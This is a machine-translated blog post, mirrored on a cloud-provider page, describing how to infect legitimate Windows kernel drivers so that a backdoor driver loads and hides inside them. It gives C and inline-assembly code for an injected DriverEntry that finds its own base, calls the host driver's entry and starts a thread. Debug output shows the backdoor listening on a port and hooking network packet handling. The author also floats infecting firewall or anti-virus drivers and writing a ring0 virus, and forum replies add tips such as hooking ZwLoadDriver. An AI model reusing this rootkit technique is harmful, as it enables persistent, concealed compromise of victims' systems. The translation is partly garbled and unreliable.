Home > Others

A Method for loading drivers

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >
This was thought of for a long time, until the first two days to make a rough look of the program

When the problem was solved, I thought about the startup Kernel File ntoskrnl.exe, which was infected with the internal Kernel File. Later, I thought it was a public criticism, and it was annoying not to load it before loading it, but to select a time in it. later, the driver was infected. this solution solves three problems for my backdoors: file storage, startup, and hiding of kernel modules. Of course, the driver loading method has changed to two. combine the Sys File into one and put. text. data. RDATA is proposed to be added to originalfile (the inject file code segment and data segment must be. text. data, in order to be simple) and then pick out the APIS required for the two files and merge them into import directory and IAT, and then from the original two files. reloc to create a new. reloc, these are all boring jobs-___-more and more feel like a typist. set the program entry to the DriverEntry of the inject file in the new file, and then call the DriverEntry of the original file, in this way, when originalfile is the infected driver, it will first call our injection driver. Of course, the kernel module shown will not be injected with the driver: in the P experiment, the backdoor driver is inserted into a helloworld driver and infected with the driver. 
#include <ntddk.h>int i;VOID OnUnloAd( IN PDRIVER_OBJECT DriverObject ){//DbgPrint("My Driver UnloAded!/n");}//--------------------------------------------------------------------NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath ){//DbgPrint("My Driver LoAded!/n");DriverObject->DriverUnload = OnUnloAd;DbgPrint("inject SYS %d/n",i);return STATUS_SUCCESS;}//--------------------------------------------------------------------
Print only one sentence and use the DriverEntry function of the driver to insert a variable. 
//--------------------------------------------------------------------typedef NTSTATUS (*DRIVERENTRY)(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath);ULONGfAkeDriverEntryOffset= 0x87654321;ULONGreAlDriverEntry= 0x12345678;//--------------------------------------------------------------------NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath ){NTSTATUSstAtus;HANDLEhThreAd;ULONGbAse;__asm{call forwArd;bAck:pop bAse;jmp outofthisforwArd:jmp bAck}outofthis:DbgPrint("Driver begin!/n");//__asm int 3;DbgPrint("bAse: 0x%x/n",bAse);reAlDriverEntry = reAlDriverEntry + ((bAse - fAkeDriverEntryOffset) & 0xFFFFF000);DriverObject->DriverUnload = OnUnloAd;DbgPrint("reAlDriverEntry: 0x%x/n",reAlDriverEntry);((DRIVERENTRY)reAlDriverEntry)(DriverObject,RegistryPath);stAtus = PsCreateSystemThread(&hThreAd,(ACCESS_MASK)0,NULL,(HANDLE)0,NULL,InitWorkThreAd,DriverObject);if (!NT_SUCCESS(stAtus)){DbgPrint("error when creAte the threAd/n");return FALSE;}return STATUS_SUCCESS;}//--------------------------------------------------------------------
Driver begin is displayed after the infected driver is loaded!
Base: 0xf7e4d29f
Realdriverentry: 0xf7e4b313
Inject sys 0 <--------------------------- the infected DriverEntry is called.
Listening on port 9929 wait on ksemsendlistsemaphore
Miniport-> packetindicatehandler: f9d35480
Our packetindicatehandler f7e4cdf4 the backdoor is working normally. I wanted to infect some system-level sys and tried two ACPI. sys and watchdog. sys (I don't know if it is a system-level system, but it will be available when the system is turned on). The result is a direct check once the system is started, and I didn't know whether it is difficult to merge my own files, it seems that the error is not that simple. Ah, I know too little about the system. This is just a train of thought. It proves that this method is still feasible, in addition, to load the driver, you only need to be able to modify the file permissions (but it seems that the driver is the same as the administrator-___-). The process of loading the driver at system startup is unknown, it is not successful yet. It is too late to insert the driver, because many functions are not available when the system is up. it can be imagined that a firewall or anti-virus software driver is infected; P is totally depressed by this program during this time, and has gone on for 3 more lines ,,, it will be improved later: (I Feel Like linker. Now, if there are two OBJ objects, maybe I will actually make it into an EXE. Now I can consider getting a ring0 virus, specifically infecting sys, I don't know about the virus, but the ntoskrnl loading location is usually fixed, so you can find the API in the PE image ,,, however, we need to compile-___-. The advantage of merging two drivers is that we can use C and basically do not change these two drivers, it is convenient to compile complex things by the way ,,. reloc is really a good thing:> vxk published on pm ip: 221.201.108. * The method is correct, but you must write CRC sum correctly. In addition, it is best not to touch the ACPI into the table. I have learned more from the above painful lessons...

 

Vxk is published on pm ip: 221.201.108. * You can hook up zwloaddriver to wait for XXX to load. After loading XXX, you can start...

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
motives for m a a certification for dummies best loading time for website a for dummies preparing for comptia a exam starting salary for a certification another name for method

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More